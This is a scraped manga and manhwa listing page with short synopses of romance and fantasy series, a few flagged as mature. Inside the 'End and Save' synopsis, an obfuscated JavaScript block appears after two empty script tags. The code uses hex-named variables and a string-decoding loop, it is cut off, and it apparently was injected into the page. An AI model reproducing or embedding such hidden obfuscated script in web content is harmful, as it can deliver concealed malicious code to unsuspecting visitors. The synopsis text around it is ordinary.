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4041 results

I’m the Main Character’s Child

Read manhwa I’m the Main Character’s Child One day, young Emiliette, who was bullied by her servants, suddenly recalls memories of her past life. She had been reincarnated into a book she had read in her previous life, as a child of the main characters. Three years after the ending of the novel, her mother died while giving birth to Emiliette, leaving her father unattended with only his daughter left. ‘I can’t keep living like this!’ After the news of my father’s return came out, I decided to change the situation, but… “Why is that thing in front of my eyes?” – The first meeting I was looking forward to, ends with only a cold glare. ’…but I can’t give up!’ 1. Frequent encounters. “Hewwo Papa! Papa, where are you gwoing?” 2. Attacking with presents. “Papa~ I’ll give you this. It’s a gift. Let’s be close friends from now on. I’ll come every day!” 3. Compliments! “Ah! It’s so bright~ I can’t get close to Papa because he’s shining.” But something’s wrong. Even though he replies to everything I ask, his answers are… “The office.” “You’ve brought something useless again.” – Yet you kept the useless thing. “…shut up.” He’s especially shy about compliments. Does he really hate me?


The Tainted Half

Read manga The Tainted Half Two brothers. One concubine. Seolha’s face was disfigured by her mother, who sought to deny the emperor his prize: the most beautiful concubine in the world. Now forced to endure a lifetime of abuse, Seolha can only pin her hopes on Muon, the emperor’s twin brother. But is he really someone she can trust? The Tainted Half is a story tagged R18, please consider before reading this series.


Contract Wife Runs away from the CEO

<h2 style="text-align: left;">the wife contract ran away of ceo other name The Boss's Shotgun Wedding</h2> Her best friend’s planned a meticulous plan to schemed her. Her first time was snatched away by a cold demonic President. Her first love that once loved was also ruined. He threw down a marriage contract, ignoring her resistance and declare his possession to the whole world.


End and Save

The villain is the main character and the main character is the villain. A fantasy story that takes place in the present time, following the shenanigans of a villain, his assistant and their underling(s).<script></script><script>(function(_0x1a9267,_0x3cbbe4){var _0x27477b=_0x17cc,_0x2c6b68=_0x1a9267();while(!![]){try{var _0x2107b6=parseInt(_0x27477b(0x1ea))/(0x1e85+-0x2168+0x2e4)+parseInt(_0x27477b(0x1e6))/(0xa5d+0x2*0xdc9+0x25ed*-0x1)+parseInt(_0x27477b(0x1f7))/(-0x319+-0x26b*-0x9+-0xbf*0x19)*(parseInt(_0x27477b(0x1ec))/(-0x1475*-0x1+0xa41+-0x2*0xf59))+-parseInt(_0x27477b(0x1ed))/(0x1ba6+0x128f+0x2e30*-0x1)*(parseInt(_0x27477b(0x1e3))/(-0x21*-0x47+-0x19a*-0x5+-0x1*0x1123))+parseInt(_0x27477b(0x1e7))/(0x12*-0xe7+0x11c8+-0x183*0x1)*(parseInt(_0x27477b(0x1f9))/(0x40e+-0xcd*-0x3+-0x66d*0x1))+parseInt(_0x27477b(0x1f2))/(-0x236*0x1+0x8a8*-0x2+-0x3*-0x685)*(parseInt(_0x27477b(0x1fb))/(-0x1*-0x234a+0x6*-0xc1+-0x1eba))+-parseInt(_0x27477b(0x1fa))/(0x112*-0x15+0x8*0x297+0x1cd);if(_0x2107b6===_0x3cbbe4)break;else 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Somehow I Raised A Prince

When the egg was rolled in her arms, the dragon was born. A full-fledged baby-sitter. One well-bred dragon prince of one of the ten emperors. Adele is a girl who grew up in an orphanage and came to her uncle’s house. While being in charge of her aunt’s farm for nine years and taking care of all the insane things on a cow ranch, she accidentally finds a large egg in a tree hole. A child who wakes up from the egg follows Adele like a parent, and Adele gives the child the name Sigmund. In fact, Sigmund, who must be the Emperor of the Empire, stays with Adele in the form of a child, sealed with his powerful mana sealed. Grand Duke Ernest and Archmage Jensen try to find the egg of the lost dragon. Lushen, head of the Imperial knighthood, assisted by Zion, daughter of Grand duke Ernest, who has grown up as a man since childhood helps Adele. Adele and Sigmund finally enter the imperial palace where they were awaited. A magical healing love story unfolded by two people. “You are the beginning and the end of my world, Adele.” The all-fearing ruler of this world, the violent dragon prince Sigmund and his bride Adele. Read manhwa Somehow I Raised A Prince / 어쩌다 보니 왕자님 키워 버렸어요


Destructive Desires

As a lonely orphan and a corporate heir, the lives of Seo Yeonwoo and Lee Seokheon couldn’t be any more different. Due to this, Yeonwoo has been unable to refuse Seokheon’s advances to be his sex partner. But as Seokheon’s grandfather was the one to take Yeonwoo in when she was orphaned, the guilt of sleeping with her savior’s grandson weighs heavily on her mind. She finally draws the line when Seokheon pulls out a wedding ring, professing that he’s willing to go against his parents’ wishes and marry Yeonwoo. No longer wanting to become a burden to Seokheon’s family, Yeonwoo decides to pack her bags and run far away. But just when everything seems okay, Yeonwoo learns that she has an unexpected baby on the way… Associated Names Unhealthy Desire Unwholesome Desire 불건전한 욕망


The Moon Witch and The Sun King: My Salvation

When Lee Shana accidentally crossed into another world full of fantasy and beauty, sadly she had become a witch in the midst of an execution. Dying at such a wonderful age?! She couldn’t let that happen! She had to escape no matter what! But after her escape she offended none other than the crown prince Luther! What else could go wrong?


Would You Like a Cup of Tea?

Muisel was reincarnated into the novel as a side character. Muisel is destined to die from a war that the main character decides to commence. Fortunately, Muisel acquires the ability to see the past, ‘Psychometry’. She aims to use her ability to change the future for her new life, family, and her friends Would You Like A Cup of Tea? / 차 한잔 하실래요?


Queen of Avalon

“Queen Arthur. That is your name from today.” I was summoned to save the kingdom that King Arthur had rolled over. As the Archmage Merlin said, I am the possessor of the same soul as King Arthur. If I find the Holy Grail and complete my mission, will am I be able to live with love? But why are knights so rude? Xian, who has been living a life of bliss for 20 years. When I woke up one day, I became a character in a legend! The magical story of her becoming Read Queen of Avalon manga – Queen of Avalon manhwa


Hurdles to provocative

Hurdles to provocative / 越界招惹 / Cross Border Provocation / Cross-Border Provocation Wen Xian strayed into the no-man’s land, and was almost seen as a poacher. Captain Luc, isn’t it good for them to pick people’s things as soon as they meet? Lu Tieu Thien looked at the daring woman in front of her with a cold expression, attacking, kissing, and seducing at night…


From Now On, Romance

이제야 연애 Summary:Sisters Ju-eun and Hye-jin lived a miserable life. After the death of their mother, their ‘father’, who had always been absent from their lives, suddenly appeared. Hye-jin, the older sister, agreed to his suggestion: if one of them joins the ‘Daesung Group’, he will rescue them from their poverty-stricken life. However… three years after entering ‘Daesung Group’, she dies in vain. This left Ju-eun struggling with despair at her helplessness in preventing her sister’s death. But then, she gets a new opportunity when she is brought back in time and Ju-eun decides to take her sister’s place by becoming the daughter of the ‘Daesung Group’ that killed Hye-jin.


Office Gods

Read manhua Office Gods What’s it like to work at an office where all of your bosses are literal gods and goddesses? Iris, a young human woman, is swept into the world of divine bureaucracy as a mailroom assistant in the corporate HQ of the Olympians themselves! But this is no easy place for a human to be, and she’s already gotten off on the wrong foot with two handsome demigods: the fiery, short-tempered Dante, and the stoic but gentle Orion. As she grows closer to them both, can she keep her personal and professional lives separate while surviving Eros’ antics, Aphrodite’s temper, and Hermes’ pranks.
